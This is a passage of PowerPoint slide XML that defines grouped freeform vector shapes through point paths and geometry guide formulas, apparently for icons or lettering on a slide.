                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4672" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4687" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4677" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5192" y="7202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5596" y="6499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5995" y="7202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="7202"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3496" y="2231"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3496" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="2262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="223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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="192" name="Group 191"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6628652" y="1913022"/>
              <a:ext cx="1648438" cy="1930221"/>
              <a:chOff x="2414588" y="4352925"/>
              <a:chExt cx="1671637" cy="1957388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193" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2414588" y="4352925"/>
                <a:ext cx="268287" cy="174625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 709 w 746"/>
                  <a:gd name="T1" fmla="*/ 126 h 484"/>
                  <a:gd name="T2" fmla="*/ 745 w 746"/>
                  <a:gd name="T3" fmla="*/ 273 h 484"/>
                  <a:gd name="T4" fmla="*/ 294 w 746"/>
                  <a:gd name="T5" fmla="*/ 388 h 484"/>
                  <a:gd name="T6" fmla="*/ 310 w 746"/>
                  <a:gd name="T7" fmla="*/ 456 h 484"/>
                  <a:gd name="T8" fmla="*/ 200 w 746"/>
                  <a:gd name="T9" fmla="*/ 483 h 484"/>
                  <a:gd name="T10" fmla="*/ 179 w 746"/>
                  <a:gd name="T11" fmla="*/ 415 h 484"/>
                  <a:gd name="T12" fmla="*/ 32 w 746"/>
                  <a:gd name="T13" fmla="*/ 451 h 484"/>
                  <a:gd name="T14" fmla="*/ 0 w 746"/>
                  <a:gd name="T15" fmla="*/ 320 h 484"/>
                  <a:gd name="T16" fmla="*/ 147 w 746"/>
                  <a:gd name="T17" fmla="*/ 283 h 484"/>
                  <a:gd name="T18" fmla="*/ 84 w 746"/>
                  <a:gd name="T19" fmla="*/ 26 h 484"/>
                  <a:gd name="T20" fmla="*/ 205 w 746"/>
                  <a:gd name="T21" fmla="*/ 0 h 484"/>
                  <a:gd name="T22" fmla="*/ 709 w 746"/>
                  <a:gd name="T23" fmla="*/ 126 h 484"/>
                  <a:gd name="T24" fmla="*/ 530 w 746"/>
                  <a:gd name="T25" fmla="*/ 184 h 484"/>
                  <a:gd name="T26" fmla="*/ 226 w 746"/>
                  <a:gd name="T27" fmla="*/ 115 h 484"/>
                  <a:gd name="T28" fmla="*/ 263 w 746"/>
                  <a:gd name="T29" fmla="*/ 252 h 484"/>
                  <a:gd name="T30" fmla="*/ 530 w 746"/>
                  <a:gd name="T31" fmla="*/ 188 h 484"/>
                  <a:gd name="T32" fmla="*/ 530 w 746"/>
                  <a:gd name="T33" fmla="*/ 184 h 4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46" h="484">
                    <a:moveTo>
                      <a:pt x="709" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="745" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="126"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="530" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="184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94" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2443163" y="4557713"/>
                <a:ext cx="69850" cy="65087"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 195"/>
                  <a:gd name="T1" fmla="*/ 178 h 179"/>
                  <a:gd name="T2" fmla="*/ 0 w 195"/>
                  <a:gd name="T3" fmla="*/ 47 h 179"/>
                  <a:gd name="T4" fmla="*/ 157 w 195"/>
                  <a:gd name="T5" fmla="*/ 0 h 179"/>
                  <a:gd name="T6" fmla="*/ 194 w 195"/>
                  <a:gd name="T7" fmla="*/ 131 h 179"/>
                  <a:gd name="T8" fmla="*/ 42 w 195"/>
                  <a:gd name="T9" fmla="*/ 178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5" h="179">
                    <a:moveTo>
                      <a:pt x="42" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="178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5" name="Freeform 72"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2520950" y="4641850"/>
                <a:ext cx="296863" cy="220663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 825"/>
                  <a:gd name="T1" fmla="*/ 451 h 615"/>
                  <a:gd name="T2" fmla="*/ 215 w 825"/>
                  <a:gd name="T3" fmla="*/ 457 h 615"/>
                  <a:gd name="T4" fmla="*/ 767 w 825"/>
                  <a:gd name="T5" fmla="*/ 352 h 615"/>
                  <a:gd name="T6" fmla="*/ 824 w 825"/>
                  <a:gd name="T7" fmla="*/ 494 h 615"/>
                  <a:gd name="T8" fmla="*/ 73 w 825"/>
                  <a:gd name="T9" fmla="*/ 614 h 615"/>
                  <a:gd name="T10" fmla="*/ 0 w 825"/>
                  <a:gd name="T11" fmla="*/ 441 h 615"/>
                  <a:gd name="T12" fmla="*/ 624 w 825"/>
                  <a:gd name="T13" fmla="*/ 0 h 615"/>
                  <a:gd name="T14" fmla="*/ 682 w 825"/>
                  <a:gd name="T15" fmla="*/ 147 h 615"/>
                  <a:gd name="T16" fmla="*/ 215 w 825"/>
                  <a:gd name="T17" fmla="*/ 451 h 6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25" h="615">
                    <a:moveTo>
                      <a:pt x="215" y="451"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="451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" name="Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2595563" y="4859338"/>
                <a:ext cx="238125" cy="227012"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 662"/>
                  <a:gd name="T1" fmla="*/ 478 h 631"/>
                  <a:gd name="T2" fmla="*/ 157 w 662"/>
                  <a:gd name="T3" fmla="*/ 478 h 631"/>
                  <a:gd name="T4" fmla="*/ 110 w 662"/>
                  <a:gd name="T5" fmla="*/ 472 h 631"/>
                  <a:gd name="T6" fmla="*/ 94 w 662"/>
                  <a:gd name="T7" fmla="*/ 461 h 631"/>
                  <a:gd name="T8" fmla="*/ 73 w 662"/>
                  <a:gd name="T9" fmla="*/ 451 h 631"/>
                  <a:gd name="T10" fmla="*/ 73 w 662"/>
                  <a:gd name="T11" fmla="*/ 451 h 631"/>
                  <a:gd name="T12" fmla="*/ 47 w 662"/>
                  <a:gd name="T13" fmla="*/ 425 h 631"/>
                  <a:gd name="T14" fmla="*/ 21 w 662"/>
                  <a:gd name="T15" fmla="*/ 383 h 631"/>
                  <a:gd name="T16" fmla="*/ 21 w 662"/>
                  <a:gd name="T17" fmla="*/ 383 h 631"/>
                  <a:gd name="T18" fmla="*/ 10 w 662"/>
                  <a:gd name="T19" fmla="*/ 357 h 631"/>
                  <a:gd name="T20" fmla="*/ 5 w 662"/>
                  <a:gd name="T21" fmla="*/ 325 h 631"/>
                  <a:gd name="T22" fmla="*/ 0 w 662"/>
                  <a:gd name="T23" fmla="*/ 299 h 631"/>
                  <a:gd name="T24" fmla="*/ 5 w 662"/>
                  <a:gd name="T25" fmla="*/ 273 h 631"/>
                  <a:gd name="T26" fmla="*/ 5 w 662"/>
                  <a:gd name="T27" fmla="*/ 273 h 631"/>
                  <a:gd name="T28" fmla="*/ 21 w 662"/>
                  <a:gd name="T29" fmla="*/ 252 h 631"/>
                  <a:gd name="T30" fmla="*/ 37 w 662"/>
                  <a:gd name="T31" fmla="*/ 231 h 631"/>
                  <a:gd name="T32" fmla="*/ 63 w 662"/>
                  <a:gd name="T33" fmla="*/ 210 h 631"/>
                  <a:gd name="T34" fmla="*/ 100 w 662"/>
                  <a:gd name="T35" fmla="*/ 189 h 631"/>
                  <a:gd name="T36" fmla="*/ 467 w 662"/>
                  <a:gd name="T37" fmla="*/ 0 h 631"/>
                  <a:gd name="T38" fmla="*/ 535 w 662"/>
                  <a:gd name="T39" fmla="*/ 131 h 631"/>
                  <a:gd name="T40" fmla="*/ 189 w 662"/>
                  <a:gd name="T41" fmla="*/ 304 h 631"/>
                  <a:gd name="T42" fmla="*/ 189 w 662"/>
                  <a:gd name="T43" fmla="*/ 304 h 631"/>
                  <a:gd name="T44" fmla="*/ 157 w 662"/>
                  <a:gd name="T45" fmla="*/ 325 h 631"/>
                  <a:gd name="T46" fmla="*/ 142 w 662"/>
                  <a:gd name="T47" fmla="*/ 341 h 631"/>
                  <a:gd name="T48" fmla="*/ 142 w 662"/>
                  <a:gd name="T49" fmla="*/ 341 h 631"/>
                  <a:gd name="T50" fmla="*/ 137 w 662"/>
                  <a:gd name="T51" fmla="*/ 367 h 631"/>
                  <a:gd name="T52" fmla="*/ 147 w 662"/>
                  <a:gd name="T53" fmla="*/ 394 h 631"/>
                  <a:gd name="T54" fmla="*/ 147 w 662"/>
                  <a:gd name="T55" fmla="*/ 394 h 631"/>
                  <a:gd name="T56" fmla="*/ 157 w 662"/>
                  <a:gd name="T57" fmla="*/ 409 h 631"/>
                  <a:gd name="T58" fmla="*/ 168 w 662"/>
                  <a:gd name="T59" fmla="*/ 420 h 631"/>
                  <a:gd name="T60" fmla="*/ 178 w 662"/>
                  <a:gd name="T61" fmla="*/ 431 h 631"/>
                  <a:gd name="T62" fmla="*/ 194 w 662"/>
                  <a:gd name="T63" fmla="*/ 435 h 631"/>
                  <a:gd name="T64" fmla="*/ 210 w 662"/>
                  <a:gd name="T65" fmla="*/ 435 h 631"/>
                  <a:gd name="T66" fmla="*/ 226 w 662"/>
                  <a:gd name="T67" fmla="*/ 435 h 631"/>
                  <a:gd name="T68" fmla="*/ 263 w 662"/>
                  <a:gd name="T69" fmla="*/ 420 h 631"/>
                  <a:gd name="T70" fmla="*/ 593 w 662"/>
                  <a:gd name="T71" fmla="*/ 252 h 631"/>
                  <a:gd name="T72" fmla="*/ 661 w 662"/>
                  <a:gd name="T73" fmla="*/ 383 h 631"/>
                  <a:gd name="T74" fmla="*/ 157 w 662"/>
                  <a:gd name="T75" fmla="*/ 630 h 631"/>
                  <a:gd name="T76" fmla="*/ 100 w 662"/>
                  <a:gd name="T77" fmla="*/ 509 h 631"/>
                  <a:gd name="T78" fmla="*/ 157 w 662"/>
                  <a:gd name="T79" fmla="*/ 478 h 6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62" h="631">
                    <a:moveTo>
                      <a:pt x="157" y="478"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="157" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="478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7" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2678113" y="4995863"/>
                <a:ext cx="257175" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 714 w 715"/>
                  <a:gd name="T1" fmla="*/ 120 h 495"/>
                  <a:gd name="T2" fmla="*/ 68 w 715"/>
                  <a:gd name="T3" fmla="*/ 494 h 495"/>
                  <a:gd name="T4" fmla="*/ 0 w 715"/>
                  <a:gd name="T5" fmla="*/ 367 h 495"/>
                  <a:gd name="T6" fmla="*/ 640 w 715"/>
                  <a:gd name="T7" fmla="*/ 0 h 495"/>
                  <a:gd name="T8" fmla="*/ 714 w 715"/>
                  <a:gd name="T9" fmla="*/ 120 h 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5" h="495">
                    <a:moveTo>
                      <a:pt x="714" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="68" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="12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8" name="Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2724150" y="5103813"/>
                <a:ext cx="239713" cy="238125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 546 w 668"/>
                  <a:gd name="T1" fmla="*/ 115 h 663"/>
                  <a:gd name="T2" fmla="*/ 488 w 668"/>
                  <a:gd name="T3" fmla="*/ 152 h 663"/>
                  <a:gd name="T4" fmla="*/ 494 w 668"/>
                  <a:gd name="T5" fmla="*/ 152 h 663"/>
                  <a:gd name="T6" fmla="*/ 494 w 668"/>
                  <a:gd name="T7" fmla="*/ 152 h 663"/>
                  <a:gd name="T8" fmla="*/ 535 w 668"/>
                  <a:gd name="T9" fmla="*/ 152 h 663"/>
                  <a:gd name="T10" fmla="*/ 556 w 668"/>
                  <a:gd name="T11" fmla="*/ 163 h 663"/>
                  <a:gd name="T12" fmla="*/ 578 w 668"/>
                  <a:gd name="T13" fmla="*/ 168 h 663"/>
                  <a:gd name="T14" fmla="*/ 578 w 668"/>
                  <a:gd name="T15" fmla="*/ 168 h 663"/>
                  <a:gd name="T16" fmla="*/ 609 w 668"/>
                  <a:gd name="T17" fmla="*/ 195 h 663"/>
                  <a:gd name="T18" fmla="*/ 635 w 668"/>
                  <a:gd name="T19" fmla="*/ 225 h 663"/>
                  <a:gd name="T20" fmla="*/ 635 w 668"/>
                  <a:gd name="T21" fmla="*/ 225 h 663"/>
                  <a:gd name="T22" fmla="*/ 651 w 668"/>
                  <a:gd name="T23" fmla="*/ 257 h 663"/>
                  <a:gd name="T24" fmla="*/ 662 w 668"/>
                  <a:gd name="T25" fmla="*/ 284 h 663"/>
                  <a:gd name="T26" fmla="*/ 667 w 668"/>
                  <a:gd name="T27" fmla="*/ 310 h 663"/>
                  <a:gd name="T28" fmla="*/ 662 w 668"/>
                  <a:gd name="T29" fmla="*/ 336 h 663"/>
                  <a:gd name="T30" fmla="*/ 662 w 668"/>
                  <a:gd name="T31" fmla="*/ 336 h 663"/>
                  <a:gd name="T32" fmla="*/ 651 w 668"/>
                  <a:gd name="T33" fmla="*/ 362 h 663"/>
                  <a:gd name="T34" fmla="*/ 635 w 668"/>
                  <a:gd name="T35" fmla="*/ 389 h 663"/>
                  <a:gd name="T36" fmla="*/ 615 w 668"/>
                  <a:gd name="T37" fmla="*/ 409 h 663"/>
                  <a:gd name="T38" fmla="*/ 578 w 668"/>
                  <a:gd name="T39" fmla="*/ 436 h 663"/>
                  <a:gd name="T40" fmla="*/ 231 w 668"/>
                  <a:gd name="T41" fmla="*/ 662 h 663"/>
                  <a:gd name="T42" fmla="*/ 152 w 668"/>
                  <a:gd name="T43" fmla="*/ 541 h 663"/>
                  <a:gd name="T44" fmla="*/ 478 w 668"/>
                  <a:gd name="T45" fmla="*/ 331 h 663"/>
                  <a:gd name="T46" fmla="*/ 478 w 668"/>
                  <a:gd name="T47" fmla="*/ 331 h 663"/>
                  <a:gd name="T48" fmla="*/ 509 w 668"/>
                  <a:gd name="T49" fmla="*/ 305 h 663"/>
                  <a:gd name="T50" fmla="*/ 520 w 668"/>
                  <a:gd name="T51" fmla="*/ 284 h 663"/>
                  <a:gd name="T52" fmla="*/ 520 w 668"/>
                  <a:gd name="T53" fmla="*/ 284 h 663"/>
                  <a:gd name="T54" fmla="*/ 520 w 668"/>
                  <a:gd name="T55" fmla="*/ 262 h 663"/>
                  <a:gd name="T56" fmla="*/ 509 w 668"/>
                  <a:gd name="T57" fmla="*/ 236 h 663"/>
                  <a:gd name="T58" fmla="*/ 509 w 668"/>
                  <a:gd name="T59" fmla="*/ 236 h 663"/>
                  <a:gd name="T60" fmla="*/ 498 w 668"/>
                  <a:gd name="T61" fmla="*/ 221 h 663"/>
                  <a:gd name="T62" fmla="*/ 488 w 668"/>
                  <a:gd name="T63" fmla="*/ 210 h 663"/>
                  <a:gd name="T64" fmla="*/ 472 w 668"/>
                  <a:gd name="T65" fmla="*/ 205 h 663"/>
                  <a:gd name="T66" fmla="*/ 462 w 668"/>
                  <a:gd name="T67" fmla="*/ 199 h 663"/>
                  <a:gd name="T68" fmla="*/ 446 w 668"/>
                  <a:gd name="T69" fmla="*/ 199 h 663"/>
                  <a:gd name="T70" fmla="*/ 425 w 668"/>
                  <a:gd name="T71" fmla="*/ 205 h 663"/>
                  <a:gd name="T72" fmla="*/ 388 w 668"/>
                  <a:gd name="T73" fmla="*/ 221 h 663"/>
                  <a:gd name="T74" fmla="*/ 79 w 668"/>
                  <a:gd name="T75" fmla="*/ 425 h 663"/>
                  <a:gd name="T76" fmla="*/ 0 w 668"/>
                  <a:gd name="T77" fmla="*/ 305 h 663"/>
                  <a:gd name="T78" fmla="*/ 472 w 668"/>
                  <a:gd name="T79" fmla="*/ 0 h 663"/>
                  <a:gd name="T80" fmla="*/ 546 w 668"/>
                  <a:gd name="T81" fmla="*/ 115 h 6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68" h="663">
                    <a:moveTo>
                      <a:pt x="546" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="205"/>
